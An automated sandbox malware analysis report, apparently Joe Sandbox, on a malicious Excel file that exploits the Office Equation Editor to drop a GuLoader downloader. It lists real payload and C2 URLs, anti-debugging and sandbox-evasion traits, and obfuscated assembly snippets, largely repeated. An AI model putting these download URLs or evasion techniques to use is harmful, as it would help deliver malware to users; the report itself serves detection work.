mov esi, edx 0x00000098 pushad 0x00000099 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2820

Thread sleep time: -360000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_037575E7 rdtsc

4_2_037575E7

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000004.00000002.677054111.00000000008D4000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_729A1BFF

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_037575E7 rdtsc

4_2_037575E7

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375374E mov eax, dword ptr fs:[00000030h]	4_2_0375374E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375452E mov eax, dword ptr fs:[00000030h]	4_2_0375452E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037539E7 mov eax, dword ptr fs:[00000030h]	4_2_037539E7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757C3A mov eax, dword ptr fs:[00000030h]	4_2_03757C3A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757E25 mov eax, dword ptr fs:[00000030h]	4_2_03757E25
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757223 mov eax, dword ptr fs:[00000030h]	4_2_03757223
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03753A11 mov eax, dword ptr fs:[00000030h]	4_2_03753A11
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03756E03 mov eax, dword ptr fs:[00000030h]	4_2_03756E03
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375588D mov eax, dword ptr fs:[00000030h]	4_2_0375588D

Source: C:\Users\Public\vbc.exe

Code function: 4_2_03758A91 RtlAddVectoredExceptionHandler,

4_2_03758A91

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.16.4.125	unknown	United States		14618	AMAZON-AESUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://50.16.4.125/E/raki.exe	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://dariamob.ro/wed/eee_XScUCMEVL	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 00000004.00000002.678614834.0000000003750000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL"}

Multi AV Scanner detection for submitted file

Source: listing new.xlsx	Virustotal: Detection: 37%			Perma Link
Source: listing new.xlsx	ReversingLabs: Detection: 34%

Antivirus detection for URL or domain

Source: http://50.16.4.125/E/raki.exe

Avira URL Cloud: Label: malware

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.16.4.125:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.16.4.125:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 52MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://dariamob.ro/wed/eee_XScUCMEVL

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125

Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.676925104.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.463627479.000000000040A000.00000008.00020000.sdmp, vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc.exe, 00000004.00000002.677115561.0000000001DB0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.677115561.0000000001DB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED38AF1.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

4_2_004056DE

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040755C	4_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406D85	4_2_00406D85
Source: C:\Users\Public\vbc.exe	Code function: 4_2_729A1BFF	4_2_729A1BFF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03755F78	4_2_03755F78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757148	4_2_03757148
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375452E	4_2_0375452E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375490A	4_2_0375490A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037541E4	4_2_037541E4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037507E3	4_2_037507E3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037551C4	4_2_037551C4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03755DB5	4_2_03755DB5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754FBC	4_2_03754FBC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375599B	4_2_0375599B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375567B	4_2_0375567B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757A67	4_2_03757A67
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375466B	4_2_0375466B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757652	4_2_03757652
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03755E4E	4_2_03755E4E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757E25	4_2_03757E25
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03756E15	4_2_03756E15
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037580D9	4_2_037580D9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03756CCB	4_2_03756CCB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375629E	4_2_0375629E

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: listing new.xlsx	Virustotal: Detection: 37%
Source: listing new.xlsx	ReversingLabs: Detection: 34%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$listing new.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE926.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/21@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_0040498A

Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.678614834.0000000003750000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_729A30C0 push eax; ret	4_2_729A30EE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750353 push 92DC45CCh; ret	4_2_03750352
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750542 pushad ; retf	4_2_03750546
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03752B48 push ebx; retf	4_2_03752B49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754115 push cs; ret	4_2_03754124
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754115 push ebx; iretd	4_2_037541E3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037541A1 push ebx; iretd	4_2_037541E3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750798 push esp; ret	4_2_037507AE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03751986 push ebx; iretd	4_2_0375198B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03753070 push 8175DDB0h; ret	4_2_03753076
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754047 push ebp; iretd	4_2_03754053
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03753029 push ebx; ret	4_2_0375303D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750C10 pushfd ; retf	4_2_03750C11
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750219 push 92DC45CCh; ret	4_2_03750352
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03752807 push esp; retf	4_2_03752810
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037502F7 push 92DC45CCh; ret	4_2_03750352
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037506D7 push edx; ret	4_2_037506D8

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_729A1BFF

Persistence and Installation Behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsj734E.tmp\System.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2820

Thread sleep time: -360000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_037575E7 rdtsc

4_2_037575E7

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000004.00000002.677054111.00000000008D4000.00000004.00000020.sdmp

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_729A1BFF

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_037575E7 rdtsc

4_2_037575E7

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375374E mov eax, dword ptr fs:[00000030h]	4_2_0375374E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375452E mov eax, dword ptr fs:[00000030h]	4_2_0375452E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037539E7 mov eax, dword ptr fs:[00000030h]	4_2_037539E7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757C3A mov eax, dword ptr fs:[00000030h]	4_2_03757C3A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757E25 mov eax, dword ptr fs:[00000030h]	4_2_03757E25
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757223 mov eax, dword ptr fs:[00000030h]	4_2_03757223
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03753A11 mov eax, dword ptr fs:[00000030h]	4_2_03753A11
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03756E03 mov eax, dword ptr fs:[00000030h]	4_2_03756E03
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375588D mov eax, dword ptr fs:[00000030h]	4_2_0375588D

Source: C:\Users\Public\vbc.exe

Code function: 4_2_03758A91 RtlAddVectoredExceptionHandler,

4_2_03758A91

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000004.00000002.677080565.00000000009B0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

4_2_0040352D

ID:	557639
Product:	CloudBasic
Start time:	12:36:13
Start date:	21.01.2022
Sample:	listing new.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	4aae6390327810b9cb4055320ea85c31
SHA1:	aec6f3bfebe0e92c2d9d16c2fc50e7ab06349a8a
SHA256:	7830f70d3c66ebdb8bcd854c46efd02c4689fd952f0f701029b14c2c37ee1bc0
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
